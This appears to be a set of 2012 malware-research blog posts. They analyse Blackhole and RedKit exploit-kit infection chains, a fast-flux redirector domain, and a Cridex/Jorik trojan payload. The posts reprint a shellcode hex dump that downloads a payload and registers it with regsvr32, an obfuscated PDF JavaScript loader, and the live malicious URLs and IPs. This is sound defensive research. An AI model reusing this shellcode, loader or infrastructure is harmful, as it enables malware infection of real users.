           = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
     UINT uCmdShow = 0;
) =  0x20;
BOOL TerminateThread (
     HANDLE hThread = -2;    // exit...
     DWORD dwExitCode = 0;
) =  0x0;
While the other one shellcode 2 is so similar to it with aiming different download url: 68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Means: "h00p://ｖirtual-geocaching.net/ｗ.php?f=80f39&e=4"
For PDF infector, Most scanner cannot detect below evil script written in it: ＜xfa:ｓcript contentType='application/x-javaｓcript'＞
with（event）{
e=target["eval"];
if（（app.addMenuItem＋""）.indexOf（"Me"＋"nuItem"）!=-1）{a=target.subject;}
}
a=a.split（"."）;
s="";
z=a;
for（i in a）{
zz=i;
}
for（i=0;i<zz;i＋＋）{
 s＋=String.fromCharCode（-33＋1*z[i]）;
}
e（""＋s）;
＜/xfa:ｓcript＞
↑While the Subject object contains exploit & shellcode: <＜/Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
  :
snip
  :
CreationDate(66;83;e4;fc;fc;85;e4; //shelcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
The payload itself is the PE file of Trojan/Cridex ,  which has the below analysis: Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed:  0 Actual:  130407
Packer: PureBasic 4.x -> Neil Hodgson 
Sections:
   .code 0x1000 0x24cf 9728
   .text 0x4000 0x23c8 9216
   .rdata 0x7000 0x10 512 
   .data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\System\CurrentControlSet\Control\Terminal Server (TSUserEnabled )

At the time I got this only 3 AV products detected it:
Symantec                 : W32.Cridex
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Downloader.A
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
I uploaded samples to Virus Total to check/monitor RECENT detection ratio: AcroPDF.PDF/ap2.pdf            50583375d345fb7a294e26094601699a (18/42)Gam.jar                        ab4af9072132f170024a9072e0288459 (9/42)main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3 (9/42)wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9 (10/42)

So the moral of the story is : With BHEK infector domains lasts max up to 2days, with landing pages changes per one click on the BHEK2 and hourly on previous version, while they started using network tools for protection & C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!

Chủ Nhật, 16 tháng 9, 2012

A peek into "qaqipwel.ru" a Malicious Domain Redirector with Pseudo/Dynamic IP - Infector to RedKit Exploit Kit

02:34

nam tóc xù

This is a quicky, so please bare w/ it. The information might be important for the people who is handling the malware infector sites.

While handling a report lead to the RedKit Exploit Kit/Pack, I came to a domain who's actively redirecting users to the RedKit Exploit Kit's landing page.
This domain is qaqipwel.ru

It uses the pseudo dns for NS & A records to avoid blocking/tracking, currently is up and alive, and has a strong DNS network backbone for round-robin the IP/DNS address for the purpose to distribute malware Landing page or spam page distribution.
I tagged & checked this for only a couple days so far to confirm the redirection activities above. Here goes the details (Warning: This might be not too interesting for client security solution guys, and I am not going to discuss about RedKit Exploit itself in this post, please see this link for the details RedKit Exploit Kit Information--->>HERE)


The url provided by qaqipwel.ru is changed, currently is below:
h00p://qaqipwel.ru/count22.php

If you track it correctly you will ending up in these redirection -
for the last 24hrs:
h00p://sa-wan.com/93020006.html // RedKit EK Landing Page
h00p://cestasefloresluana.com.br/30400006.html // RedKit EK Landing Page
h00p://mytabletcialis.com/ // Clialis/viagra site
h00p://goherdscan.com/  // Canadian Pharmacy
As PoC - When fetching the infector page you'll get many redirection tricks like:  Case1 --15:35:30--  h00p://qaqipwel.ru/count22.php            => `count22.php' Resolving qaqipwel.ru... 77.38.198.12 Connecting to qaqipwel.ru|77.38.198.12|:80... connected. HTTP request sent, awaiting response... 302 Location: h00p://sa-wan.com/93020006.html [following] --15:35:33--  h00p://sa-wan.com/93020006.html            => `93020006.html' Resolving sa-wan.com... 72.167.232.75 Connecting to sa-wan.com|72.167.232.75|:80... connected.
Case2 --15:49:39--  h00p://qaqipwel.ru/count22.php            => `count22.php.1' Resolving qaqipwel.ru... 77.90.120.34 Connecting to qaqipwel.ru|77.90.120.34|:80... connected. HTTP request sent, awaiting response... 200 Length: 146 [] 15:49:40 (0.00 B/s) - `count22.php' saved [146/146]  HTTP/1.1 200  Server: Apache Content-Length: 142 Content-Type:  Last-Modified: .., 16 ... 2012 06:42:12 GMT Accept-Ranges: bytes Server:nginx/0.8.34 Date:Sun, 16 Sep 2012 06:42:15 GMT X-Powered-By:PHP/5.3.2 ＜!DOCTYPE HTML＞＜html＞＜head＞
＜script type="text/javascript"＞
parent.location.href = "h00p://goherdscan.com/";＜/script＞
:
Case3 (via tor) --2012-09-16 15:16:04--  h00p://qaqipwel.ru/count22.php Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 302 Location: h00p://cestasefloresluana.com.br/30400006.html [following] --2012-09-16 15:16:12--  h00p://cestasefloresluana.com.br/30400006.html Connecting to localhost (localhost)|::1|:8118... connected.
Case4 --2012-09-16 15:20:10--  h00p://qaqipwel.ru/count22.php Resolving localhost (localhost)... 127.0.0.1, ::1 Connecting to localhost (localhost)|::1|:8118... connected. Proxy request sent, awaiting response... 200 Length: 146 [] Saving to: `count22.php' 100%[=============>] 146          361B/s   in 0.4s Last-modified header invalid -- time-stamp ignored. 2012-09-16 15:20:12 (361 B/s) - `count22.php' saved [146/146]  $ cat count22.php  ＜!DOCTYPE HTML＞＜html＞＜head＞
＜script type="text/javascript"＞
parent.location.href = "h00p://mytabletcialis.com/";＜/script＞
:
If you lookup the domain registration it was mentioned these data: IP:             62.84.60.2 INET:           62.84.60.0/22 AS:             AS39824 ISP:            ALMANET-AS JSC AlmaTV Country:        Kazakhstan kz flag State/Region:   Almaty City City:           Almaty Latitude:       43.25 Longitude:      76.95
Which in the actual is like these ones: PSEUDO A (IP) RECORDS DETECTED BY FACTS: 178.137.1.4
129.241.150.45
89.115.162.87
92.49.3.129
159.224.125.227
88.135.159.37
93.113.237.108
46.186.83.133
188.173.100.142
89.221.112.165
31.14.136.113
77.38.198.12
1.249.216.225
203.142.169.131
109.185.53.194
94.112.97.46
46.120.219.104
112.209.92.132
77.122.122.94
188.241.186.4
  :
  :
and so on...(last counted 233 IP's Sept 17th 2012)
And with the official DNS Registration was: domain:        QAQIPWEL.RU (A records per NS changes) nserver:       ns1.chokode.com. 3545  IN   A  217.144.208.27  nserver:       ns2.chokode.com. 3469  IN   A  175.194.252.182 nserver:       ns3.chokode.com. 3394  IN   A  87.110.121.10 nserver:       ns4.chokode.com. 3394  IN   A  178.155.43.251 nserver:       ns5.chokode.com. 3600  IN   A  111.184.220.233 nserver:       ns6.chokode.com. 3394  IN   A  94.53.46.22 state:         REGISTERED, DELEGATED, UNVERIFIED person:        Private Person registrar:     REGGI-REG-RIPN admin-contact: http://www.webdrive.ru/webmail/ created:       2012.09.06 paid-till:     2013.09.06 free-date:     2013.10.07
While in actual you will get these Random DNS Records: Domain Queried : qaqipwel.ru Tracing to qaqipwel.ru[a] via a.root-servers.net., maximum of 1 retries a.root-servers.net. (198.41.0.4)  |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried  |\___ a.dns.ripn.net [ru] (193.232.128.6)  |     |\___ ns1.chokode.com [qaqipwel.ru] (91.187.182.249) Got auth.answer  |     |\___ ns2.chokode.com [qaqipwel.ru] (46.229.107.36) Got auth.answer  |     |\___ ns3.chokode.com [qaqipwel.ru] (89.115.162.87) Got auth.answer  |     |\___ ns4.chokode.com [qaqipwel.ru] (109.87.58.1) Got auth.answer  |     |\___ ns6.chokode.com [qaqipwel.ru] (94.41.4.214) Got auth.answer  |      \___ ns5.chokode.com [qaqipwel.ru] (89.115.162.87) (cached)  |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried  |\___ b.dns.ripn.net [ru] (194.85.252.62)  |     |\___ ns6.chokode.com [qaqipwel.ru] (194.54.180.242) Got auth.answer  |     |\___ ns2.chokode.com [qaqipwel.ru] (46.211.255.80) Got auth.answer  |     |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) Got auth.answer  |     |\___ ns1.chokode.com [qaqipwel.ru] (180.149.212.148) Got auth.answer  |     |\___ ns3.chokode.com [qaqipwel.ru] (77.221.76.117) Got auth.answer  |      \___ ns5.chokode.com [qaqipwel.ru] (114.25.144.116) Got auth.answer  |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried  |\___ e.dns.ripn.net [ru] (193.232.142.17)  |     |\___ ns6.chokode.com [qaqipwel.ru] (89.102.91.73) Got auth.answer  |     |\___ ns5.chokode.com [qaqipwel.ru] (88.222.161.159) Got auth.answer  |     |\___ ns4.chokode.com [qaqipwel.ru] (93.114.88.159) (cached)  |     |\___ ns3.chokode.com [qaqipwel.ru] (180.149.212.148) (cached)  |     |\___ ns2.chokode.com [qaqipwel.ru] (93.105.30.91) Got auth.answer  |      \___ ns1.chokode.com [qaqipwel.ru] (89.40.57.110) Got auth.answer  |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried  |\___ f.dns.ripn.net [ru] (193.232.156.17)  |     |\___ ns6.chokode.com [qaqipwel.ru] (111.184.220.233) Got auth.answer  |     |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)  |     |\___ ns3.chokode.com [qaqipwel.ru] (46.160.95.107) Got auth.answer  |     |\___ ns5.chokode.com [qaqipwel.ru] (111.34.117.125) Got auth.answer  |     |\___ ns2.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)  |      \___ ns4.chokode.com [qaqipwel.ru] (37.205.75.204) Got auth.answer  |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried   \___ d.dns.ripn.net [ru] (194.190.124.17)        |\___ ns3.chokode.com [qaqipwel.ru] (75.64.99.215) Got auth.answer        |\___ ns5.chokode.com [qaqipwel.ru] (89.39.7.1) Got auth.answer        |\___ ns4.chokode.com [qaqipwel.ru] (89.40.57.110) (cached)        |\___ ns6.chokode.com [qaqipwel.ru] (91.187.181.6) Got auth.answer        |\___ ns1.chokode.com [qaqipwel.ru] (109.87.58.1) (cached)         \___ ns2.chokode.com [qaqipwel.ru] (89.102.91.73) (cached)
↑Please see how the IP ADDRESS of each NS host are chnaging↑  Additionally some DNS delegation information:  +-d.dns.ripn.net (194.190.124.17) |  +-e.dns.ripn.net (193.232.142.17) |  |  +-f.dns.ripn.net (193.232.156.17) |  |  |  +-ns.ripn.net (194.85.105.17) |  |  |  |  +-ns2.nic.fr (192.93.0.4) |  |  |  |  |  +-ns5.msk-ix.net (193.232.128.6) |  |  |  |  |  |  +-ns9.ripn.net (194.85.252.62) |  |  |  |  |  |  |  
This infected url was uploaded to the urlquery here--->>[CLICK]And currently we have a weak detection of qaqipwel.ru in the blacklist:  Conclusion:Such professional malicious redirector provider is currently exist. The below domain names are the ones used for this evil purpose: nujqamdi.ru axbuzyg.ru  aldiplil.ru uqnymtyq.ru bawodnes.ru gezahcyg.ru cilcenok.ru vecvycte.ru irroxux.ru  unxajen.ru meewxib.ru  deqbyyq.ru  byxkauv.ru  qovizki.ru  huenhaz.eu axbuzyg.ru  kykufep.ru  luxypuj.eu   ( ↑ domains detected until by the time this blog is written)
The combination possibilities for filename "count$.php" was detected as per below: count4.php  count20.php count21.php count19.php count18.php count16.php count17.php count14.php  count5.php  count13.php count11.php count12.php count25.php count6.php  count15.php ( ↑ landing page detected until by the time this blog is written)
Domain names can be changed and the IP addresses are pseudo/dynamically changed. We cannot depend on blacklist anymore to nail this kind of infectors.

Thứ Bảy, 15 tháng 9, 2012

Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)

09:40

nam tóc xù

Well, currently #MalwareMustDie is in the hunting mode, so I joined the event, this is actually a report of the first case in hand which becoming an important matter in investigation of BHEK.

I received report of infection, and after looking a squid log I found the source
which is 203.91.113.6 and is "suspected" serving blackhole.
Why I quoted that word is because I am about 95% sure of it.

Just arrived home from 6hrs driving trip, after setting freebsd for analysis mode,
setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The reported url at squid log url doesn't seem to exist anymore,
looks like the parameter was changed which was:

h00p://bode-sales.net/w.php?f=9e4b3&e=2

I tried to combine the latest blackhole possible parameters and finally managed to
download the below url (via tor only..)

--21:26:28-- ｈ00p://bode-sales.net/main.php?page=3c23940fb7350489
=> `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]

GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

....(blah)

The file itself is the obvious BHEK landing page obfuscated JS/Code
for the research purpose I neutralized it here:-->>[PASTEBIN]
And after deobfs'ed it found the Plugin Detection of blackhole -
which also for the research purpose I neutralized it here:-->>[PASTEBIN]

The first time I checked in Virus Total about this landing page was ZERO, now:

MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago )
URL: ---------->>[VIRUS-TOTAL]

Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl

Like the previously reported in this blog-->[HERE] basically exploit vector
of the plugin detect is unchanged,
and in our case now we have 6(six) exploitations.

(The details is exactly asp per reported beforehand)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time is without the SWF Exploit infector
A friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]

However we have the slight changes in the shellcode.
I am a big fan of shellzer, a PyDbg base shellcode decoder, and
using it often to many of my projects.
We have a problem figuring this blog's shellcode using shellzer.
So I cracked it manually, if some of you have same problem
I think I am sharing this howto as reference:

The above infector exploit sets the has the mission
to execute the below shellcode:

41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81
e9 56ｆe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3
af 1c Oｃad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 2O cO b4 d6 d7 ｄ7a6 66 26 c4 bO d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7
58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44
4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d
1e 4b 1f 49 Oe 4d 15 19 28 28
*) PS: the above↑shellcode is neutralized

FYI, shellzer hangs if you pasted this code. I am not going into
debugging details on WHY it hangs, let's focus to the
point and solve the code..

Let's dump all of the strings first, you'll get something like this:

iiiiN
..u4._3
d.@0.@
f.^＜
t3,..
u..4$..uQ..LQV.u＜.t5x
.V.v
@..;
u.^.^$
K.F.
....h
.......XPj@h
...P.
PU...^
.hon..hurlmT
...a
.r..
...\$
AQj.j.SWj.
j...
?.u.G
/p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((

We won't know what this is all about except the looks of obfuscated URL -
in the last line, so I scan it to get below signatures & info..

msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC

By this I guessed the API method of urlmon.dll, and others
was used to the code.. but couldn't detect any kernel32.dll API yet..
Let's skip it for a while..Now is time to bruteforce(bf) the code,
you can use any tools available and try some bf logic! :-)
Shortly, I got these interesting strings and fixed them:

ｈ00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) which further $h lead to temp dir strings &
$i leads to null values so I put 0 in it.

The story is urlmon.dll is being called to download
malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1"
save as %Temp%wpbt0.dll, execute, register it with "regsvr32 -s"
command in your PC. Looks like we have a slight changes in shellcode
API for the usage of calls from non kernel32.dll.
This is different point compares to previous BHEK shellcode,
So let's see what payload it is (using tor) and saved it as per malware
scheme wanted it.

--2012-09-15 20:47:08-- ｈ00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]

It is a PE binary with the below analysis:

Hexing first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................

↑Quick reversing it...too seek some clue..
[0x00000000:0x00400000]> d
0x00000000 (01) 4d DEC EBP
0x00000001 (01) 5a POP EDX
0x00000002 (01) 90 NOP
0x00000003 (02) 0003 ADD [EBX], AL
0x00000005 (02) 0000 ADD [EAX], AL
0x00000007 (03) 000400 ADD [EAX+EAX], AL
0x0000000a (02) 0000 ADD [EAX], AL
0x0000000c (01) ff DB 0xff
0x0000000d (02) ff00 INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000 ADD [EAX], AL
0x00000017 (03) 0040 00 ADD [EAX+0x0], AL
: :
ーーーーーtastes like a packer trace..ーーーー
0x00000034 (02) 0000 ADD [EAX], AL
0x00000036 (02) 0000 ADD [EAX], AL
0x00000038 (02) 0000 ADD [EAX], AL
0x0000003a (02) 0000 ADD [EAX], AL
0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0
0x0000003f (02) 000e ADD [ESI], CL
0x00000041 (01) 1f POP DS
0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e
0x00000047 (02) cd 21 INT 0x21
0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01
0x0000004e (01) 54 PUSH ESP
0x0000004f (05) 68 69732070 PUSH 0x70207369
0x00000054 (02) 72 6f JB 0x000000c5 ; 1
: :
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections:
.code 0x1000 0x2775 10240
.teXT 0x4000 0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data 0x13000 0x1218 2560
.rsrc 0x15000 0x115c 4608

Auto reverse first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
:
loop
:
[0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]

Calls:
Complete calls listed here:--->>[PASTEBIN]
With the calls summary as per below:
Get system env, opening /exec files(by original C code),
opening thread, using timer.bitmap object manipulation,
GUI operations, using winsock, creation of TLS, creation of semaphores

↑OK, looks strange enough,　let's reverse it well, I used radare2.
You can use anything you like, if you reversed it correctly
you'll find the below malicious API commands inside of the
packed parts of the sample (tips, unpacked it first):

CopyFileW
(lpExistingFileName: "%Temp%wpbt0.dll",
lpNewFileName: "%ApData%\KB00725031.exe",
bFailIfExists: 0x0)

CreateRemoteThread
(hProcess: 0x68,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0x12032f0,
lpParameter: 0x1200000,
dwCreationFlags: 0x0,
lpThreadId: 0x0)

So we have a self copy operations and foreign memory injection here.
Yes, let's use sandbox to quickly confirm it:

Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328 c:\documents and settings\user\application data\kb00725031.exe

Yes it dropped malicious malware kb00725031.exe - and somehow I remembered
this filename a while ago. I searched & found it here --->>[LINK]
(It will be another story of long history for the detail of this drop)
Let's continue,
Virus Total detection shows this detection when I found the payload 1st time:

AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware

Now is becoming:

MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware

Well it supposed to connect to internet, let's carefully run it a bit :-)
Well it works as per expected, & starting to communicate to mothership -
in 146.185.220.34! Below is my record in UDP traffic:

Req:
00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 .ru.....

Ans:
00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........
00000030 0e 0f 00 04 92 b9 dc 22 ......."

Yes, it asked for

tuninglambosglamour.ru IN A // 146.185.220.34

I bet it does some more malicious stuffs as per refered analysis above.

By the way the network info of the mothership:

inetnum: 146.185.220.0 - 146.185.220.255
netname: mdsru-net
descr: MDS LTD.
country: RU
org: ORG-Ml192-RIPE
admin-c: AV6782-RIPE
tech-c: VA2854-RIPE
status: ASSIGNED PA
mnt-by: mdsru-mnt
source: RIPE # Filtered

organisation: ORG-Ml192-RIPE
org-name: MDS ltd.
org-type: OTHER
abuse-mailbox: info@mdsnet.org
address: Sofia Kovalevsaja st. 22
address: 620242 Ekaterinburg
address: Russian Federation
mnt-ref: mdsru-mnt
admin-c: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Andrey Voronov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russian Federation
phone: +74957392422
nic-hdl: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

person: Vlad Abramov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russia
phone: +74957392422
nic-hdl: VA2854-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered

While the landing page is in this network:

inetnum: 203.91.112.0 - 203.91.119.255
netname: G-Mobile
descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr: Ulaanbaatar 211213, Mongolia
country: MN
admin-c: TG154-AP
tech-c: TG154-AP

route: 203.91.113.0/24
descr: G-Mobile Subnet
origin: AS24559
mnt-by: MAINT-MN-WIRELESSCOM
changed: tulga@g-mobile.mn 20090205
source: APNIC

person: Tulga Gandavaa
nic-hdl: TG154-AP
